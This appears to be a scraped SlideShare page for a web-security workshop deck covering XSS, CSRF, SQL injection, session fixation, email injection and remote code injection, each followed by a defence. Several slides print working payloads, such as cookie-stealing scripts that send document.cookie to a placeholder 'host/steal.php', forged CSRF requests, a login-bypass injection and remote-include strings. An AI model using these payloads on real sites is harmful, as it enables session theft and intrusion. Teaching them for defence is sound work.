Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
Evolution of Web Security Chris Shiflett @shiflett • shiflett.org
Web developer from Brooklyn, NY, and Who am I? founding member of Analog, a web design & development co-oper...
1. Fundamentals
Three Principles Defense in depth — Redundant safeguards are valuable. Least privilege — Grant as little freedom as po...
Two Practices Filter input. — Ensure data coming in is valid. Escape output. — Ensure data going out is not misinterp...
Filter input. Escape output. Filter Application Escape
<?php $clean = array(); if (ctype_alpha($_POST['name'])) {     $clean['name'] = $_POST['name']; } else { /* Error */...
<?php $clean = array(); switch ($_POST['color']) {     case 'red':     case 'green':     case 'blue':         $clean['co...
<?php $clean = array(); $colors = array('red', 'green', 'blue'); if (in_array($_POST['color'], $colors)) {     $clean['...
<?php $clean = array(); $colors = array(); $colors['red'] = ''; $colors['green'] = ''; $colors['blue'] = ''; if (isset(...
<?php $clean = array(); if (preg_match('/^d{5}$/', $_POST['zip'])) {     $clean['zip'] = $_POST['zip']; } else {    ...
<?php /* Content-Type: text/html; charset=UTF-8' */ $html = array(); $html['user'] = htmlentities($clean['user'], ...
Exploits Cross-Site Session Scripting Hijacking Cross-Site Email Injection Request Forgeries ...
Cross-Site Scripting 1 2 HTML Attacker XSS Target Vic...
echo $_GET['user']; http://host/foo.php?user=%3Cscript%3E… echo '<script>…';
Steal Cookies <script> document.location = 'http://host/steal.php?cookies=' + encodeURI(document.cookie); </scri...
Steal Passwords <script> document.forms[0].action = 'http://host/steal.php'; </script>
Steal Saved Passwords <form name="steal" action="http://host/steal.php"> <input type="text" name="username" style="...
Short & Simple <script src="http://host/evil.js"></script>
Character Encoding $string = "<script>alert('XSS');</script>"; $string = mb_convert_encoding($string, 'UTF-7');   echo h...
Stop It! FIEO. Use valid HTML. — http://validator.w3.org/ Use existing solutions. — PHP developers, use htmlentities()...
Cross-Site Request Forgeries 1 2 Attacker ? Victim CSRF Target
CSRF Because the attack is carried out by the victim, CSRF can bypass: — HTTP auth — Session-based auth — Firewalls — &c.
<form action="buy.php" method="post"> <input type="hidden" name="isbn" value...
Forging GET <img src="http://host/buy.php?isbn=059600656X" /> GET /buy.php?isbn=059600656X HTTP/1.1 Host: host Cookie...
Forging POST <iframe style="visibility: hidden" name="secret"></iframe> <form name="buy" action="http://host/buy.php" met...
CSRF Exploits Amazon (Fixed?) http://shiflett.org/amazon.php Digg (Fixed) http://4diggers.blogspot.com/
Steal Cookies (Improved) <script> new Image().src = 'http://host/steal.php?cookies=' + encodeURI(document.co...
Stop It! $token = md5(uniqid(rand(), TRUE)); $_SESSION['token'] = $token; $html['token'] = htmlentities($token, ENT_QUOTE...
SQL Injection 1 2 SQL Attacker SQL Target Database ...
SELECT count(*) FROM users WHERE username = '{$_POST['username']}' AND password = '…' ...
Stop It! FIEO. Use prepared statements. — PHP developers, use PDO. addslashes() Versus m...
Session Fixation http://host/login.php?PHPSESSID=1234
Stop It! Regenerate the session identifier. — PHP developers, session_regenerate_id(TRUE). Do this whenever the privile...
Session Hijacking Attacker impersonates a victim. In PHP, by default, only requires a valid session identifier. Session ...
Stop It! Understand how sessions work. Minimize session identifier exposure. — SSL — Separate domain for embedded resourc...
Email Injection mail('chris@example.org', 'Feedback', '...', "From: {$_POST['email']}"); fake@example.orgrnBcc: v...
Stop It! FIEO. — http://iamcal.com/publish/articles/php/parsing_email — PHP developers, use ctype_print() as defense in...
Remote Code Injection Attacker Target
include "{$_COOKIE['type']}.php"; Cookie: type=http://host/inject.inc? include "http://host/inject.inc?.php";
Remote Code Injection This example exploits allow_url_fopen. PHP 5 has allow_url_include. — By default, allow_url_incl...
include "{$_GET['type']}.php"; POST /script.php?type=php://input%00 HTTP/1.1 Host: host Content-Type: application/x-ww...
Stop It! FIEO. — If at all possible, use a white list.
2. Emerging Trends
Ajax “The name is shorthand for Asynchronous JavaScript + XML, and it represents a fundamental shift in what’s poss...
Ajax “Client-side techniques & technologies that allow two-way communication between the client and the server wit...
Cross-Domain Ajax Victim 1. XMLHttpRequest Target 2. HTM...
XSS + Ajax + CSRF Victim 1. XMLHttpRequest Target 2. HTM...
Worms XSS is a perfect platform for CSRF. CSRF attacks can exploit XSS vulnerabilities. Victims can become attackers. ...
Browser Hijacking http://shiflett.org/blog/2006/oct/using-csrf-for-browser-hijacking Myspace CSRF and XSS Worm (Samy) ...
Cross-Domain Ajax <cross-domain-policy> <allow-access-from domain="*"/> </cross-domain-policy> Th...
Cross-Domain Ajax domain="*" API domain Vulnerable? No yahoo.com No No ...
JavaScript Hijacking 1 2 Attacker ? Victim CSRF Target 4 3
<script src="http://host/json.php"></script> [{"email": "chris@shiflett.org"}] JavaScript Hijacking Demo...
JavaScript Hijacking “If you audit your application for CSRF flaws, you’ve defeated this attack. Moreover, the well...
3. Ideas for the Future
Trending “When you visit a web site, you are allowing that site to access a lot of information about your comput...
Trending “Not the intent, but Panopticlick from @eff would be useful for preventing session hijackin...
Trending Establish trends to help detect anomalies. Trends can be based on identity or behavior. Trending is imperfect;...
Security-Centered Design Webstock 2010 Thursday, 18 February After lunch (13:25) Illot Thea...
Slides http://slideshare.net/shiflett http://shiflett.org/evolution-of-web-security.pdf
Feedback? Follow me on Twitter. — @shiflett Comment on my blog. — shiflett.org Email me. — chris@shiflett.org Work wit...
Evolution Of Web Security
Upcoming SlideShare
Loading in …5
×

Evolution Of Web Security

16,267 views

Published on

This is a multi-faceted workshop that explores new concepts in web security. After a solid grounding in well-known exploits like cross-site scripting (XSS) and cross-site request forgeries (CSRF), I'll demonstrate how traditional exploits are being used together and with other technologies like Ajax to launch sophisticated attacks that penetrate firewalls, target users, and spread like worms. I'll then discuss some ideas for the future, such as evaluating trends to identify suspicious activity and understanding human tendencies and behavior to help provide a better, more secure user experience.

Published in: Technology
License: CC Attribution-NonCommercial-NoDerivs License
no profile picture user

  • Be the first to comment

Show More

Evolution Of Web Security

  1. Evolution of Web Security Chris Shiflett @shiflett • shiflett.org
  2. Web developer from Brooklyn, NY, and Who am I? founding member of Analog, a web design & development co-operative.
  3. 1. Fundamentals
  4. Three Principles Defense in depth — Redundant safeguards are valuable. Least privilege — Grant as little freedom as possible. Least complicated — Complexity breeds mistakes.
  5. Two Practices Filter input. — Ensure data coming in is valid. Escape output. — Ensure data going out is not misinterpreted.
  6. Filter input. Escape output. Filter Application Escape
  7. <?php $clean = array(); if (ctype_alpha($_POST['name'])) {     $clean['name'] = $_POST['name']; } else { /* Error */ } ?>
  8. <?php $clean = array(); switch ($_POST['color']) {     case 'red':     case 'green':     case 'blue':         $clean['color'] = $_POST['color'];         break;     default:         /* Error */         break; } ?>
  9. <?php $clean = array(); $colors = array('red', 'green', 'blue'); if (in_array($_POST['color'], $colors)) {     $clean['color'] = $_POST['color']; } else {     /* Error */ } ?>
  10. <?php $clean = array(); $colors = array(); $colors['red'] = ''; $colors['green'] = ''; $colors['blue'] = ''; if (isset($colors[$_POST['color']])) {     $clean['color'] = $_POST['color']; } else {     /* Error */ } ?>
  11. <?php $clean = array(); if (preg_match('/^d{5}$/', $_POST['zip'])) {     $clean['zip'] = $_POST['zip']; } else {     /* Error */ } ?>
  12. <?php /* Content-Type: text/html; charset=UTF-8' */ $html = array(); $html['user'] = htmlentities($clean['user'], ENT_QUOTES, 'UTF-8'); echo "<p>Welcome, {$html['user']}.</p>"; ?>
  13. Exploits Cross-Site Session Scripting Hijacking Cross-Site Email Injection Request Forgeries Remote Code Injection SQL Injection Session Fixation
  14. Cross-Site Scripting 1 2 HTML Attacker XSS Target Victim XSS
  15. echo $_GET['user']; http://host/foo.php?user=%3Cscript%3E… echo '<script>…';
  16. Steal Cookies <script> document.location = 'http://host/steal.php?cookies=' + encodeURI(document.cookie); </script>
  17. Steal Passwords <script> document.forms[0].action = 'http://host/steal.php'; </script>
  18. Steal Saved Passwords <form name="steal" action="http://host/steal.php"> <input type="text" name="username" style="display: none" /> <input type="password" name="password" style="display: none" /> <input type="image" src="image.png" /> </form>
  19. Short & Simple <script src="http://host/evil.js"></script>
  20. Character Encoding $string = "<script>alert('XSS');</script>"; $string = mb_convert_encoding($string, 'UTF-7');   echo htmlentities($string); Google XSS Example http://shiflett.org/blog/2005/dec/google-xss-example
  21. Stop It! FIEO. Use valid HTML. — http://validator.w3.org/ Use existing solutions. — PHP developers, use htmlentities() or htmlspecialchars(). — Make sure you indicate the character encoding! Need to allow HTML? — Use HTML Purifier, even if you’re not using PHP: http://htmlpurifier.org/
  22. Cross-Site Request Forgeries 1 2 Attacker ? Victim CSRF Target
  23. CSRF Because the attack is carried out by the victim, CSRF can bypass: — HTTP auth — Session-based auth — Firewalls — &c.
  24. <form action="buy.php" method="post"> <input type="hidden" name="isbn" value="059600656X" /> <input type="submit" value="Buy" /> </form> Buy POST /buy.php HTTP/1.1 Host: host Cookie: PHPSESSID=1234 Content-Type: application/x-www-form-urlencoded Content-Length: 15 isbn=059600656X
  25. Forging GET <img src="http://host/buy.php?isbn=059600656X" /> GET /buy.php?isbn=059600656X HTTP/1.1 Host: host Cookie: PHPSESSID=1234
  26. Forging POST <iframe style="visibility: hidden" name="secret"></iframe> <form name="buy" action="http://host/buy.php" method="post" target="secret"> <input type="hidden" name="isbn" value="059600656X" /> </form> <script type="text/javascript">document.buy.submit();</script> POST /buy.php HTTP/1.1 Host: host Cookie: PHPSESSID=1234 Content-Type: application/x-www-form-urlencoded Content-Length: 15 isbn=059600656X
  27. CSRF Exploits Amazon (Fixed?) http://shiflett.org/amazon.php Digg (Fixed) http://4diggers.blogspot.com/
  28. Steal Cookies (Improved) <script> new Image().src = 'http://host/steal.php?cookies=' + encodeURI(document.cookie); </script>
  29. Stop It! $token = md5(uniqid(rand(), TRUE)); $_SESSION['token'] = $token; $html['token'] = htmlentities($token, ENT_QUOTES, 'UTF-8'); <input type="hidden" name="token" value="<?php echo $html['token']; ?>" />
  30. SQL Injection 1 2 SQL Attacker SQL Target Database SQL
  31. SELECT count(*) FROM users WHERE username = '{$_POST['username']}' AND password = '…' chris' /* SELECT count(*) FROM users WHERE username = 'chris' /*' AND password = '…'
  32. Stop It! FIEO. Use prepared statements. — PHP developers, use PDO. addslashes() Versus mysql_real_escape_string() http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string
  33. Session Fixation http://host/login.php?PHPSESSID=1234
  34. Stop It! Regenerate the session identifier. — PHP developers, session_regenerate_id(TRUE). Do this whenever the privilege level changes.
  35. Session Hijacking Attacker impersonates a victim. In PHP, by default, only requires a valid session identifier. Session identifier obtained using: — Prediction — Capture — Fixation
  36. Stop It! Understand how sessions work. Minimize session identifier exposure. — SSL — Separate domain for embedded resources Trending — https://panopticlick.eff.org/ — More on this later…
  37. Email Injection mail('chris@example.org', 'Feedback', '...', "From: {$_POST['email']}"); fake@example.orgrnBcc: victim@example.orgrnBcc: … To: chris@example.org Subject: Feedback From: fake@example.org Bcc: victim@example.org Bcc: …
  38. Stop It! FIEO. — http://iamcal.com/publish/articles/php/parsing_email — PHP developers, use ctype_print() as defense in depth.
  39. Remote Code Injection Attacker Target
  40. include "{$_COOKIE['type']}.php"; Cookie: type=http://host/inject.inc? include "http://host/inject.inc?.php";
  41. Remote Code Injection This example exploits allow_url_fopen. PHP 5 has allow_url_include. — By default, allow_url_include is disabled.
  42. include "{$_GET['type']}.php"; POST /script.php?type=php://input%00 HTTP/1.1 Host: host Content-Type: application/x-www-form-urlencoded Content-Length: ? ? include "php://input";
  43. Stop It! FIEO. — If at all possible, use a white list.
  44. 2. Emerging Trends
  45. Ajax “The name is shorthand for Asynchronous JavaScript + XML, and it represents a fundamental shift in what’s possible on the Web.” — Jesse James Garrett
  46. Ajax “Client-side techniques & technologies that allow two-way communication between the client and the server without reloading the page.”
  47. Cross-Domain Ajax Victim 1. XMLHttpRequest Target 2. HTML form + victim’s token JS 3. XMLHttpRequest + victim’s token
  48. XSS + Ajax + CSRF Victim 1. XMLHttpRequest Target 2. HTML form + victim’s token XSS 3. XMLHttpRequest + victim’s token
  49. Worms XSS is a perfect platform for CSRF. CSRF attacks can exploit XSS vulnerabilities. Victims can become attackers. Rinse. Repeat.
  50. Browser Hijacking http://shiflett.org/blog/2006/oct/using-csrf-for-browser-hijacking Myspace CSRF and XSS Worm (Samy) http://shiflett.org/blog/2005/oct/myspace-csrf-and-xss-worm-samy
  51. Cross-Domain Ajax <cross-domain-policy> <allow-access-from domain="*"/> </cross-domain-policy> Thanks, Flash!
  52. Cross-Domain Ajax domain="*" API domain Vulnerable? No yahoo.com No No youtube.com No Yes api.flickr.com No Yes No adobe.com Yes No
  53. JavaScript Hijacking 1 2 Attacker ? Victim CSRF Target 4 3
  54. <script src="http://host/json.php"></script> [{"email": "chris@shiflett.org"}] JavaScript Hijacking Demo http://mochikit.com/fortify_fud/
  55. JavaScript Hijacking “If you audit your application for CSRF flaws, you’ve defeated this attack. Moreover, the well-known, pre-existing exploits for CSRF are actually worse than this attack.” — Thomas Ptacek
  56. 3. Ideas for the Future
  57. Trending “When you visit a web site, you are allowing that site to access a lot of information about your computer’s configuration. Combined, this information can create a kind of fingerprint — a signature that could be used to identify you and your computer.” Panopticlick https://panopticlick.eff.org/
  58. Trending “Not the intent, but Panopticlick from @eff would be useful for preventing session hijacking.” — http://twitter.com/shiflett/status/8562663352
  59. Trending Establish trends to help detect anomalies. Trends can be based on identity or behavior. Trending is imperfect; use as defense in depth.
  60. Security-Centered Design Webstock 2010 Thursday, 18 February After lunch (13:25) Illot Theatre
  61. Slides http://slideshare.net/shiflett http://shiflett.org/evolution-of-web-security.pdf
  62. Feedback? Follow me on Twitter. — @shiflett Comment on my blog. — shiflett.org Email me. — chris@shiflett.org Work with me. — analog.coop

×